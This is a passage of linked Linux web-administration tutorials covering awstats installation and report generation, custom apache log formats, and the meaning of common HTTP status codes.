When the script runs it creates (if it doesn't already exist) a directory named after last month. If the current month is September, the directory will be named "August" (or the equivalent for your machine's locale setting). The awstats icons directory will be copied there, then a report will be generated for last month and put in the month's directory.

To look at a monthly report you'll use a similar URL to viewing the current report, but you'll insert the name of the month you want to view in front of the page name. The first letter of the monthly directory names is capitalized, so it will have to be capitalized in the URL used to visit a monthly report as well.

To take our example URL from earlier and use it to look at the August statistics we would change it to:
http://www.example.com/webstats/August/awstats.www.example.com.html

Keeping more monthly reports


Note that the way the script is written the monthly reports get replaced every year (since they're only made available by month name, not by year).

If you want monthly reports to never get overwritten you can modify the script to add the year to the directory names. Change the line that defines "LASTMONTH" above to something like:
LASTMONTH=`date -d "last month" +%B-%Y`

If the month were September, the above line would cause the script to use the directory name "August-2010".

Further reading


You have a solid but basic installation of awstats now. If you want to get more out of awstats there are a few advanced features you can look into.

For starters, you can browse the awstats documentation online.

If you want to generate reports on the fly you can do so by setting up the main awstats.pl script to run as a CGI script from a web browser. It would be a good idea to still run the stats update through a schedule. You'll want to be familiar with using CGI with a web server, and be aware of the risks that can be involved (for both performance and security). Then check theawstats install docs and take a look at the script they provide for automating aspects of that configuration.

If you want to extend awstats there are plugins available on the project's web site. A couple of the more interesting ones let awstats determine the country of origin of visitor IP addresses without launching a lot of cumbersome DNS lookups.

With a little tweaking and help from the documentation, awstats can also be used to build reports for mail and FTP servers.

Digging through all the options in the config file will give you an idea of what sorts of changes you can make to reports and their formatting.

Generating and viewing awstats reports

Generating and viewing awstats reports


Now that awstats is installed we take a look at actually running the analysis and viewing the reports.




Awstats in action


If you followed along with the first part of this series you should have awstats installed and configured for your site. In this article we'll look at a simple approach to report generation from the command line.

This approach will create static html pages to display your web traffic.

Build a report


Time to tell awstats to generate your reports. Fortunately for our "start with something simple" approach, there's a script that rolls generating several reports into one step.

awstats_buildstaticpages.pl


We're going to use a script that's included with awstats, "awstats_buildstaticpages.pl". This script updates the stats and generates a bunch of standard reports, using the main "awstats.pl" script behind the scenes. For a closer look at what reports this script will build, check the awstats online documentation.

For our example the command would look like:
sudo /usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/public/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl

Okay, yeah. I admit that's kind of long. But it's not as scary as it seems, honest. Especially since you won't have to memorize it.

Let's break that down so you know what to put where.

The script itself


/usr/local/awstats/tools/awstats_buildstaticpages.pl

This part is the script we're running, "awstats_buildstaticpages.pl". If you installed to a location other than "/usr/local/awstats" you'll want to change this part to point to the actual location of the script on your machine.

The -update option


-update

Including "-update" at the beginning of the options tells the script to update the stats analysis before generating the reports.

The -config option


-config=www.example.com

The "config" value should be the main domain name for the site. Note that this domain matches up with the name of the config file you created in the first part of this series. The name of your config file should have "awstats." before the main domain name, and ".conf" after it, since that's pretty much what this script will be looking for.

In short, replace "www.example.com" with your main domain name.

The -dir option


-dir=/home/demo/public_html/example.com/public/webstats

The "-dir" option refers to the directory where you want awstats to create its reports. That directory should contain an "awstatsicons" directory containing awstats' standard image files.

The -awstatsprog option


-awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl

For "-awstatsprog" you'll want the value to be the location of the "awstats.pl" script, which is the main awstats script. If you installed awstats someplace other than "/usr/local/awstats", adjust accordingly.

The script's results


Once you run that big command (all on one line) you should see that the script launches the awstats update process, then tells you about every one of the 20 reports it's generating.

If the script encountered an error it should give you some troubleshooting advice (like making sure you used the right "config" identifier).

Note that the last line, the "Main HTML page" line, gives the main page of the report.

If you take a look in your reports directory you should now see a bunch of html files there:
$ ls /home/demo/public_html/example.com/public/webstats                              
awstats.articles.slicehost.com.alldomains.html
awstats.articles.slicehost.com.allhosts.html
...

View the report


Now we get to see the results of our hard work. Point your browser to the "main html file" that was identified by the script we ran to generate the report.
http://www.example.com/webstats/awstats.www.example.com.html

The important part here is working out the address you'll use to view the reports. If you discover at this point that you created the reports in a directory you can't see from a browser, you may want to make a new reports directory. Edit your awstats config file accordingly, then run the report generation again to make sure it works with the new directory.

If all goes well you'll see something like:

Awstats example

(Without the smudges, of course.)

You might see less than a day's worth of traffic in this initial report, or perhaps a week, depending on how often your web logs are rotated. So not a lot that's interesting just yet, but enough to make sure the reports were generated properly.

Visits, hits, pages and bandwidth


There are a bunch of reports available, linked at the top of your main report's page. The main statistics you'll see at the beginning of the report bear some quick explanation, just so you know what you're looking at.

Unique visitors


The "unique visitors" stat tracks the number of different visitors your site received. For awstats this mostly means the number of unique IP addresses it saw in your web logs. This number isn't perfectly accurate, since visitors behind proxy servers and home routers can throw it off a bit (since those visitors would only appear in your web logs under the IP addresses belonging to the proxies or routers).

Number of visits


This stat tracks how many times visitors came back to the site. A "visit" for these purposes will encompass all page hits from a visitor within an hour or so of each other. If the same IP address appears in the web logs the next day that would count as a second visit.

Pages


A "page", in web traffic terms, is the main page of a visited URL. This would be the HTML or PHP file that was requested by the visitor. If a page includes the contents of other HTML files, only the main page is counted as a "page" in the traffic stats.

Hits


Pretty much everything a web browser asks for from a site is a "hit". The main page, headers and footers, images, videos — everything the browser has to ask for is a hit. A complex site will produce a fair number of hits per page visit.

Bandwidth


In the combined log format the web server records the size of all the requests and responses that get sent between the browser and the server. The total of all the outgoing response sizes is the "bandwidth" statistic in awstats. This is not necessarily the total bandwidth used by the site — it's just the total bandwidth that got recorded in your web server's access logs.

A note about referer spam


You may notice that the "referer" information in your reports contains links to referring web sites. This is useful for checking out sites that are linking to you but there's a potential drawback to putting this information on a web page, and that's "referer spam".

There's a school of thought among less-reputable web admins that encourages doing whatever you can to increase your search engine ratings. One of those tactics involves finding a site with a publicly-accessible web stats page and then running a script that visits the site a bunch of times using their web site as a referrer. The theory is that search engines will count the stats page as another site linking to their site.

In practice it doesn't work that well (most major search engines are wise to the practice and account for it), but that doesn't mean we should encourage the inconsiderate jerks to keep trying it.

The preferred method to keeping the stats pages from being used for spamming purposes is to protect the stats directory from unauthorized access. You can do that by password-protecting that part of the site, or by restricting access to that site to just localhost and using ssh tunneling to view your stats.

If you want to keep your stats public you should at least modify your site's "robots.txt" file to tell the major search engines not to index your stats pages. If you don't have a robots.txt file in the document root of your site this is a good time to create one.

Inside the robots.txt file you just need to add a "Disallow" rule for the web stats directory. If you don't have a robots.txt file already, you can use something like the following:
User-agent: *
Disallow: /webstats/

That would tell any robot that complies with the robots.txt file not to index the "webstats" part of the site. That way your stats site won't show up on major search engines at all, defeating the purpose of any efforts to manipulate your referers report.

If you want your web stats to show up on search engines for some reason, then at least tell robots not to index the referer page report:
User-agent: *
Disallow: /webstats/awstats.www.example.com.refererpages.html

How to Install awstats on Linux

How to Install awstats on Linux


The awstats program is a versatile tool for generating web traffic reports. We'll walk through a simple installation to track stats for your site.




Web log analysis


If you run a web site you might get curious about statistics like how many people visit your site each month and what sites or search engines they used to find you. That's where web traffic analysis comes in.

There are many options for analyzing your traffic, but in this article series we'll look at a program called "awstats". Awstats runs through your web logs (which are lying around on the disk anyway) and generates reports based on what it finds. The reports break down the data to show you information like what the more popular parts of your site are, what search terms people used to get there, and which search engines have spidered your site lately.

We'll aim for a simple approach to analyzing logs with awstats in this series. There are some nifty features of awstats we won't be using (like dynamically generating reports via CGI), but the benefit of this approach is that it's light on resource use and easy to set up no matter what web server you use.

Why not just use page tagging?


A different approach to web traffic analysis is called "page tagging", used by services like Google Analytics. It involves embedding a javascript tag in your pages that causes visiting web browsers to report their visit to a master data server. Because the browser can also set a cookie to go along with the javascript, a page tagging approach can give you very good data about what individual users are up to with regards to your site.

The approach awstats uses is called "log analysis". The analyzer program goes through your web logs line-by-line and sorts out what files got served and where the requests came from. Because this approach doesn't rely on the visiting web browser executing any specific code properly, the numbers for total traffic a log analyzer gathers with will be closer to an accurate tally. The downside is that the only identifying information recorded about a visitor is the IP address they used, which isn't always a reliable way to distinguish between users (since several of them could be behind the same proxy server or firewall).

In the end, neither approach is really superior to the other.

Page tagging gives you better information about how often visitors return to your site and what they do there, but doesn't record visitors that can't or won't execute the tag (like older browsers, many mobile phones, users with privacy concerns, and search engine robots).

Log analysis gives you better information about how much traffic your web server handles but is less reliable when it comes to determining site usage patterns.

See where I'm going? Both approaches have complementary strengths and weaknesses. Somewhere between the page tagging statistics and the web log analysis lies the whole picture.

For the most accurate assessment you'll want to have both types of usage reports available and extrapolate from there.

Prerequisites


Before installing awstats pick out the virtual host you want to report on. If you want to use more than one you can go through this guide again for each one, but make sure each virtual host is logging to its own access log. It's possible to use a single log for multiple sites, but it's more complicated and isn't recommended. We're going for simple, remember?

Web server


First make sure you have a web server. Hey, might as well be thorough.

With that out of the way, we want to see if the virtual host we're going to be tracking is logging in the right format. While awstats can handle some other log formats, what we want to use is the standard "combined" web log format.

Most web servers, like nginx or lighttpd, use the combined log format by default. No problems there unless you went out of your way to change it.

If you're using apache it might be logging in either a "combined" or a "common" log format. To find out which, take a look in your virtual host config file and look for the "CustomLog" directive:
CustomLog /var/www/access.log combined

That last word is the one to check for the format. If it isn't there, or if it says something like "common", change the config so it's using "combined" for the format instead. For more information on the combined log format, check out this article for apache or this article for nginx.

If you altered the format used for the virtual host's log remember to reload the web server to implement the change.

Perl


The awstats scripts use a scripting language called "perl". It's used for a lot of things, so you probably have it installed already.

To check, run the command:
perl -v

If you get a response that gives you a perl version, you're set. If you get a "command not found" error then you need to install perl. You should be able to do that through your distribution's package manager, like yum or aptitude.

Download and extract


We're actually not going to use your Linux distribution's pre-packaged version of awstats (even if it has one). The awstats program gets updated regularly, and new versions include data on the latest web browser and operating system identifiers. It's best if you install the source package for awstats, then manually update it regularly so you get the most accurate reports possible.

You can get the latest version of awstats from the project's download page. You can decide if you want the latest beta for cutting-edge reporting data, or if you want to get the latest stable version instead and play it safe. In this guide we used the latest stable version (6.95 at the time of this writing).

Get the download with the ".tar.gz" extension. It's more unixy, and saves you from checking script permissions after the install.

You can either download the package from the awstats site to your desktop and then upload it to your VPS with scp, or you can download it directly to the VPS if you have wget installed:
wget http://prdownloads.sourceforge.net/awstats/awstats-6.95.tar.gz

Once you have the package on your VPS, unpack it:
tar -xvzf awstats-6.95.tar.gz

You should end up with a directory named after the awstats version, like "awstats-6.95". Now you just need to move that to wherever you actually want awstats installed (I used /usr/local/awstats):
sudo mv awstats-6.95 /usr/local/awstats

If you want to update to another version of awstats later, just go through those steps with the new version. Replace the old "awstats" directory with the new one. Simple.

Choose the reports directory


Next you'll need to create an output directory for your reports. This can be pretty much anywhere you like, since the reports are just static html pages. They just need to be accessible from your web browser if you want to view them.

For this example, let's say we're going to be tracking traffic for "www.example.com", and we put that site's files in a directory in the "demo" user's home directory. We're feeling unoriginal, so we'll make a "webstats" directory for awstats' reports:
mkdir -p /home/demo/public_html/example.com/public/webstats

The awstats icons


The html pages that awstats creates when it makes its reports want to use some images to make them a bit less bland. Let's make sure a copy of those images will be available to the reports we generate:
cp -R /usr/local/awstats/wwwroot/icon /home/demo/public_html/example.com/public/webstats/awstatsicons

When you update awstats you may want to re-copy this directory as well, to catch any additions (like icons for new browsers).

Create the data directory


We'll need to give awstats a directory where it can store the data it uses to generate its reports. The default is "/var/lib/awstats". That's a pretty good location.
sudo mkdir -p /var/lib/awstats

Copy the config template


Now to set up a config file telling awstats how to process the logs for your domain. First, create a directory to hold the config:
sudo mkdir -p /etc/awstats

Next we'll copy a template config file into that directory that we can modify for our domain.

The template config file is located in the awstats installation's wwwroot/cgi-bin directory:
[awstats install]/wwwroot/cgi-bin/awstats.model.conf

Name the new config file in the style of "awstats.[main domain name].conf". If you were creating a config for "www.example.com" and had installed awstats to "/usr/local/awstats", your copy command would look like:
sudo cp /usr/local/awstats/wwwroot/cgi-bin/awstats.model.conf /etc/awstats/awstats.www.example.com.conf

Customize the configuration


Time to dig around in the config file we created. Using your favorite text editor (nano or vi, usually), edit:
/etc/awstats/awstats.www.example.com.conf

Change "www.example.com" above to the name of the domain you'll be tracking. If the file doesn't exist you may have made a typo when you copied it. The file should be chock full of stuff right now.

Fortunately, part of keeping things simple is only needing to change a few config settings, and those are toward the beginning of the file. Let's look at the settings you'll need to pay particular attention to and their default values.

LogFile


LogFile="/var/log/httpd/mylog.log"

The LogFile value is a pretty important one — it tells awstats where to find the log it's supposed to be analyzing. For our example, we'd change that value to the location of example.com's access log:
LogFile="/home/demo/public_html/example.com/log/access.log"

LogFormat


LogFormat=1

The LogFormat directive is probably not one you'll need to change, but I mention it in case you've got your domain logging in a custom format, or if you absolutely want to use another standard format like the common log format. The commented text that precedes this directive explains how you can tell awstats what your log format looks like.

There are also some predefined log formats. The default, "1", represents the combined log format. If you are using common log format you would use "4" here instead.

SiteDomain


SiteDomain=""

The SiteDomain value is where you tell awstats what your site's main domain name is. If we usually direct vistors to "www.example.com", we'd change this setting to:
SiteDomain="www.example.com"

HostAliases


HostAliases="localhost 127.0.0.1 REGEX[myserver\.com$]"

The HostAliases setting tells awstats all the different domains people might use to visit your site. It's there so it can separate external referring sites from internal links.

The default has some funky "REGEX" stuff in there — that describes a "regular expression", which is a flexible but daunting way to describe a search filter. That one above just checks for "myserver.com", for instance. We're not going to keep that. Regular expressions aren't simple (but they are useful, if you know how to use them).

All you really need for this setting is a list of domains. It's good to include "localhost" and "127.0.0.1" in there, and to throw in your main domain name and any alternates you have for the site separated by spaces:
HostAliases="www.example.com example.com www.olddomain.com olddomain.com localhost 127.0.0.1"

DNSLookup


DNSLookup=2

The DNSLookup setting is actually not one you'll want to change. At its current setting it means that awstats won't do DNS lookups on visitors' IP addresses. What awstats might glean from that information is what country the vistor is in. This can be nice to know and chart, but not nice enough for the amount of time and effort it can take awstats to make all those DNS queries.

If you really want country data for visitors, check the awstats plugin site for a couple alternatives to DNS lookup. They have an impact on awstats performance as well, but not as much as straight DNS lookups.

DirData


DirData="/var/lib/awstats"

Remember that data directory you made? This is where you tell awstats what it was. If you didn't use "/var/lib/awstats", be sure and change this value to point to your data directory.

DirIcons


DirIcons="/awstatsicons"

When the generated reports reference images they do so using this value. That directory is relative to the location of the reports. In this case, it will point to the "awstatsicons" directory we made by copying the default images directory. If you want to rename that directory you'll need to change it here so the generated reports can find the images.

Customizing apache web logs

Customizing apache web logs


You can create your own custom formats for apache web logs, to record more information or to make them easier to read. Here's how.




Changing the log format


If you know how to read web logs then you may have an idea of how you would want to write them differently — maybe add a little here, trim a little out there, switch the order around a bit. Luckily, you can do that with the access logs through a couple built-in commands and a handful of log variables.

LogFormat


Apache's "LogFormat" directive is what lets you define your own access log setup. Let's look at how that directive would be used to define the combined log format (CLF):
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined

That first argument, in quotes, is the string that describes the log format. The last argument, "combined", gives a nickname to the format that can be used by CustomLog later on.

That format string contains a bunch of placeholders that describe the data to be included in the log. That first one, for example, is "%h" and represents the IP address of the visitor (the identifier for their host). A bit further on, "%t" represents the time of the request.

Components of the CLF


Let's look at that CLF format string side-by-side with an access log entry in the format:
%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"
123.65.150.10 - - [23/Aug/2010:03:50:59 +0000] "POST /wordpress3/wp-admin/admin-ajax.php HTTP/1.1" 200 2 "http://www.example.com/wordpress3/wp-admin/post-new.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.25 Safari/534.3"

Okay, they don't look too pretty together, but there is a correlation between each element in the format string and the components of the log entry below it. Breaking down what the stuff in the format string means:
%h      The remote host
%l The remote logname (usually just "-")
%u The authenticated user (if any)
%t The time of the access
\"%r\" The first line of the request
%>s The final status of the request
%b The size of the server's response, in bytes
\"%{Referer}i\" The referrer URL, taken from the request's headers
\"%{User-Agent}i\" The user agent, taken from the request's headers

So reading along, we see that in place of "%h" is "123.65.150.10" - the remote host. And after that, "%l" becomes "-" for the remote log host, "%u" turns into "-" for the remote user (since this connection didn't require authentication), "%t" is replaced with "[23/Aug/2010:03:50:59 +0000]" because it's the time the request was sent, and so on.

Note that the places in the log format where a quote character (") was used, it was escaped in the format string with a backslash (\"). The escape is there because if it were a quote symbol by itself, LogFormat would think the format string was complete at that point. The backslash tells it to keep reading.

The last two parts of the format, the referrer and the user agent, use a format component that requires an argument — in this case which header should be extracted from the request by %i. The referrer and user agent headers are, appropriately, named "Referer" and "User-Agent", respectively.

Well, mostly appropriately. "Referer" is misspelled. That's the spelling of the header name in the HTTP standards, however, so it is "Referer" for all time when talking about web link referrers. A bit of lexicographical trivia for you there. Enjoy.

Other format components


Apart from what we saw in our breakdown of the combined log format, there are other components you can include in a LogFormat entry. Some commonly-used components are:
%{cookie}C

The contents of the cookie named "cookie" for the request.
%{header}i

The contents of the HTTP header named "header" for the request.
%{VAR}e

The contents of the environment variable "VAR" for the request.
%k

The number of keepalive requests handled by the connection that spawned the logged request. The first time a request is sent the keepalive value will be zero, but each subsequent request that uses the same keepalive connection will increase that number by one. This can be handy for seeing how many requests a keepalive connection handles before it's terminated.

If keepalives aren't enabled this value will always be zero.

If you only see very low numbers for the keepalives value in a log but have a long keepalive timeout set, then it may be worth trying a much shorter timeout for keepalives. That way apache won't be maintaining connections in memory for longer than it needs to.
%T

How long the server took to serve the request, in seconds.
%v

The ServerName of the virtual host the request was sent to. This format code can be handy if you're writing more than one virtual hosts' accesses to the same log file.

For a full list of format components see the apache documentation for LogFormat.

Make your own log format


While the LogFormat entry is useful for interpreting what appears in the logs, it can also be used to create your own formats.

If you want your log to add the length of time it takes to serve requests to its access entries, you might make a LogFormat directive that looks like:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" timed_combined

All we have to do is add a "%T" to the end of the format string, then give it a new nickname — for our example, "timed_combined".

Using the new log format


Now, if you want to tell your virtual host to make an access log using the new format, you can include in the virtual host definition:
CustomLog /var/log/apache2/timed.log timed_combined

To recap: A LogFormat directive takes a format you give it and assigns it a nickname you choose. Then you use CustomLog to tell apache to write the access log using the new format by telling it where to write the log and the nickname of your log format.

Adding more custom logs


You can have more than one CustomLog directive for a virtual host. If you already have a CustomLog using the "combined" format, you don't have to remove it when adding your "timed_combined" log. This can be useful if you want to maintain one log in CLF that a web log analyzer program can read and another log file with just the information you care about when you're skimming the entries.

So if you wanted another log with just the stuff you wanted in it, you might take that "timed_combined" format and remove the things you feel are distractions. If you decided to remove the remote log entry, the user entry, and the user agent entry, you could create that format with:
LogFormat "%h %t \"%r\" %>s %b \"%{Referer}i\" %T" slim

And then add a new CustomLog directive to use the "slim" format:
CustomLog /var/log/apache2/slim.log slim

Precedence


Note that any logs defined in a virtual host will override log directives in the main apache config file. So if the main config file has the CustomLog entry:
CustomLog /var/log/apache2/access.log combined

And the virtual host has another CustomLog entry:
CustomLog /var/log/apache2/example.com.log combined

Then the virtual host will log its accesses to the "example.com.log" file, but not to the "access.log" file. If you wanted accesses to be logged to both files, you would need to include a line for the main access.log file in the virtual host definition, as in:
CustomLog /var/log/apache2/access.log combined
CustomLog /var/log/apache2/example.com.log combined

Rotating new logs


When you create any new logs, you should remember to configure logrotate to rotate them regularly. Otherwise they may grow and grow until they eat all your disk space right up. Any logs in the default apache log directory should get rotated under apache's default rules, but if you put a new log in another directory you may need to add a rule to logrotate.

Interpreting common status codes in web logs

Interpreting common status codes in web logs


The status codes you find in your web logs are useful troubleshooting tools, but only if you know what they mean.




Status codes


When a web browser talks to a web server, the server lets the client know the status of its request by sending a "status code". This status code will show up in the access logs of the server as a number. There are a lot of different status codes that can be passed to a web client, and you can view the full list at w3's website.

Fortunately there are only a few status codes that you're likely to see in your access logs, so consider the following descriptions to be highlights from the full list of status codes.

200 - OK


The 200 status code indicates that the request was successful. This is the one you want to see in your logs. At its most basic it means that when a web browser asked for a file, the server was able to find it and send it back to the browser.

403 - Forbidden


The 403 status code indicates that the server is not allowed to respond to the web client's request.

One circumstance that can cause a 403 status is if you do not have "Indexes" enabled for a directory, and the directory doesn't have an index file in it that the server can access. In other words, the client asked for a directory, and the server doesn't find anything there it can show to the client.

A more common circumstance is that the permissions on the file or directory being requested don't allow access by the web server's user. If the web server is running as user "www-data", any files you want the web server to serve will have to be accessible by the user "www-data". For example, if a directory's permissions look like:
drwx------ 5 root     root     4096 2009-12-18 01:39 wordpress

Then the user "www-data" will not be able to access any of the files inside. Requests sent to the server that ask for the "wordpress" directory or any of its contents will yield 403 status codes instead of serving the file requested.

For more information on how Linux file permissions work, you can read this article series. In a nutshell, the web server user needs to have read permission for files in order to serve them, and it has to have read and execute permissions for directories in order to see files inside them.

404 - Not found


A 404 status code means that the requested file could not be found. If you see this error often you should check the links on your site to make sure they're pointing to the right places.

Since the filesystem is case-sensitive you should also make sure the capitalization matches between the request in the URL and the name of the file on the disk. For example, if a file is named "File.txt" and the URL requests "file.txt", the file won't be found by the web server. Either the URL or the file name would need to be changed so the capitalization matches in both instances.

A couple commonly-requested files are worthy of note.

robots.txt


If you see 404 errors connected to a file named "robots.txt", that's the result of a spider program (like web search engines use) checking to see what your preferences are for indexing your site.

If you don't want to restrict the access of web spider robots to your site, you can just create an empty robots.txt file and the 404 errors will go away.

The robots.txt file can be useful if there are parts of the site that you want search engines to ignore. If you don't want search engines to record anything in the "orders" or "scripts" directories on your site, for example, you could use the following robots.txt file:
User-agent: *
Disallow: /orders/
Disallow: /scripts/

A slash at the end of a disallow will let the search engine robot know that it refers to a directory.

The "User-agent" part of the file describes what user agent the robots.txt would apply to. The "*" means that you want the rule to apply to everybody. You can have more than one User-agent entry in a robots.txt file, as in:
User-agent: EvilSearch
Disallow: /

User-agent: *
Disallow:

In that file, the EvilSearch engine's robot would be asked not to record anything on the site (thus the "/"), while everything else will be allowed to record anything they can find (which is what the empty argument to Disallow means).

Note that the robots.txt instructions aren't enforced in any way. A spider can freely ignore them. The better search engines (the ones you've heard of) tend to obey the robots.txt file, while spiders used by spammers and email harvesters will ignore robots.txt entirely.

favicon.ico


Any 404 errors connected to "favicon.ico" are the result of a web browser checking for a favorites icon for the site. That's another file not found error that can be safely ignored if you don't want to make a favorites icon for the site.

The favorites icon is often used by modern browsers both as an icon in a bookmarks list and as an identifying icon in a tabbed interface. If you've noticed that bringing up a site puts an image associated with the site next to your address bar or in the tab for that page, the favicon.ico file is where your browser got that image.

There are ways to point a browser to another file for the favorites icon, but if you want to make a quick-and-dirty favorites icon there are several utilities on the web that either allow you to create your own or convert an image file. Once you've generated the favicon.ico file you can upload it to the document root of your site and the associated 404 errors should stop appearing in your log.

500 - Internal server error


The 500 status code is kind of a catch-all error code for when a module or external program doesn't do what the web server was expecting it to do. If you have a module that proxies requests back to an application server behind your web server, and the application server is having problems, then the server could return a 500 error to web clients.

503 - Service unavailable


The 503 status code appears when the web server can't create a new connection to handle an incoming request. If you see this status code in your logs it usually means that you're getting more web traffic than can be handled by your current web server configuration. You'll then need to look into increasing the number of clients the server can handle at one time in order to be rid of this status code.